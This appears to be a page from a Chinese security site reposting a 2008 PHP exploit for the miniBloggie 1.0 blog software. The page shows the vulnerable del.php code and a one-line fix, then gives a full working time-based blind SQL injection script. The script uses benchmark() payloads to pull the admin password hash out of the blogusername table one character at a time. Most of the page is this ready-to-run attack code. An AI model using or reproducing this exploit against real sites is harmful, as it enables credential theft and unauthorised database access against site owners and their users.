首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
来源:StAkeR[at]hotmail[dot]it 作者:StAkeR 发布时间:2008-10-20   
#!/usr/bin/php 
 StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Date   -> 18/10/2008
   Get    -> http://www.mywebland.com/dl.php?id=2
   ------------------------------------------------------------
   
   File del.php
   
   25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
   26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
   27.
   28. if ($confirm=="") {   
   29. notice("Confirmation", "Warning : Do you want to delete this post ? Yes");
   30. }
   31. elseif ($confirm=="yes") {
   32. // Data Base Connection  //
   33. dbConnect();
   34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   35. $query = mysql_query($sql) or die("Cannot query the database.
" . mysql_error());
   36. $confirm ="";
   37. notice("Del Post", "Data Deleted");
   38. }
   39. else notice( "Delete Error, Unable to complete the task !" );
   40. ?>

   NOTE:
   
   $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   
   $post_id isn't escaped so you can execute SQL Code 
   
   How to fix? sanize $post_id with intval or int (PHP Functions)
   
  
*/  



function get($host,$path,$evil)
{
  if(!preg_match('/\w:[0-9]/i',$host)) alert();
  $inet = explode(':',$host);

  if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');
  
  $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
  $data .= "Host: $host[0]\r\n";
  $data .= "User-Agent: Lynx (textmode)\r\n";
  $data .= "Connection: close\r\n\r\n";
  
  fputs($sock,$data);
  
  while(!feof($sock)) { $html .= fgets($sock); }
  fclose($sock);
  
  return $html;
}


function alert()
{
  echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
  echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
  echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
  die;
}


function charme($char,$colum,$id)
{
  $sql = "1 or (select if((ascii(substring(password".
         ",$colum,1))=$char),benchmark(200000000,char(0)),0)".
         " from blogusername where id=$id)#";
  
  return urlencode($sql);
}


$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$c = 0;


for($i=0;$i<=32;$i++)
{
  for($j=0;$j<=17;$j++)
  {
    $start = time();
    
    get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));
    
    $stop = time();
    
    if($stop - $start > 12)
    {
      $password .= chr($hash[$j]);
      $c++;;
      break;
    }
  }
}

if(isset($password))
{
  echo "# Hash: $password\r\n";
  die;
}
else
{
  echo "# Exploit Failed!\r\n";
}
    



?>

# [2008-10-18]
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Meeting Room Booking System (M
·Nuke ET <= 3.4 (fckeditor) Rem
·zeeproperty (adid) Remote SQL
·PHP Easy Downloader <= 1.5 Rem
·phpFastNews 1.0.0 Insecure C
·Solaris 9 [UltraSPARC] sadmind
·XOOPS Module GesGaleri (katego
·BitTorrent 6.0.3 .torrent File
·Wordpress Plugin st_newsletter
·Vivvo CMS <= 3.4 Multiple Vuln
·Hummingbird Deployment Wizard
·WBB Plugin rGallery 1.09 (item
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved